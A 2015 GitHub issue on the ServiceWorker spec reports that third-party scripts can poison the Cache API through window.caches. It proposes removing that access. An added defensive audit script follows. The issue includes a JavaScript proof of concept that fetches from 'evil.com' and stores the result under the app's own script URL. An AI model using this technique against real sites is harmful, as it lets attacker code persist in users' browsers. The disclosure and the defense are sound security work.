[ServiceWorker] Should window.caches be removed (or readonly) for security reasons? (#698)

I believe that a combination of `window.caches` and `cache.put` gives a script loaded from a foreign origin the opportunity to add/update resources into the caches with malicious content. Or did I miss something?

If a page includes a script `some-library.js` from a foreign origin (CDN or other), this script could include something like:

```javascript
var goodRequest = new Request('my-app.js');
var badRequest = new Request('https://evil.com/my-bad-app.js', {mode: 'no-cors'});

fetch(badRequest).then(function(badResponse) {
  return window.caches.open("my-cache-v1").then(function(cache) {
    // put bad response for good request into cache
    return cache.put(goodRequest, badResponse);
  });
}).then(function() {
  console.log('from now on content of evil.com/my-bad-app.js will be served as my-app.js');
});
```

**Possible solution**
Remove window.caches. To me, having the caches available on window seems like leaking SW internals into the global scope. Messing with caches should only be allowed within the service worker (as same origin is guaranteed).


---
https://github.com/slightlyoff/ServiceWorker/issues/698

Received on Monday, 11 May 2015 20:26:55 UTC
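As an added example (not from the issue or the ServiceWorker project), a defender-side audit for the pattern described above: it flags Cache entries keyed by a same-origin URL whose stored response has no same-origin provenance, which is what an opaque `no-cors` response from another origin (or a script-constructed `Response`, both of which carry an empty `url`) looks like. The function names, the `https://app.example` origin used in the comments and the shape of the entries are assumptions; `auditAndEvict` needs a browser `caches` object and is only meant to run in a page or service worker.

```javascript
// Added example, not part of the issue or the spec. Function names are assumptions.

// Classify one (request URL, response) pair. `origin` is the app's own origin
// (self.location.origin in a service worker, location.origin in a page).
// Returns null when the entry looks consistent, otherwise a short description.
function classifyEntry(requestUrl, response, origin) {
  if (new URL(requestUrl).origin !== origin) {
    return null; // key is a third-party URL; not the case we care about here
  }
  if (!response.url) {
    // Opaque (cross-origin no-cors) responses and Response objects built by
    // script both have an empty url: the body's provenance is unknown.
    return `no-provenance ${response.type} response stored under same-origin key`;
  }
  const respOrigin = new URL(response.url).origin;
  if (respOrigin !== origin) {
    return `response from ${respOrigin} stored under same-origin key`;
  }
  return null;
}

// Audit a list of entries shaped { url, response } and return the suspicious
// ones. `response` only needs `.url` and `.type`, so plain objects work too.
function auditEntries(entries, origin) {
  const findings = [];
  for (const { url, response } of entries) {
    const problem = classifyEntry(url, response, origin);
    if (problem) findings.push({ url, problem });
  }
  return findings;
}

// Browser-only: read a named cache (e.g. 'my-cache-v1'), audit every entry and
// evict the flagged ones, returning the findings for logging or reporting.
async function auditAndEvict(cacheName, origin) {
  const cache = await caches.open(cacheName);
  const entries = [];
  for (const request of await cache.keys()) {
    entries.push({ url: request.url, response: await cache.match(request) });
  }
  const findings = auditEntries(entries, origin);
  for (const f of findings) {
    await cache.delete(f.url);
  }
  return findings;
}
```

Running `auditAndEvict` from the service worker's `activate` handler gives the same-origin code that owns the cache a chance to drop entries poisoned from the page context before `fetch` starts serving them.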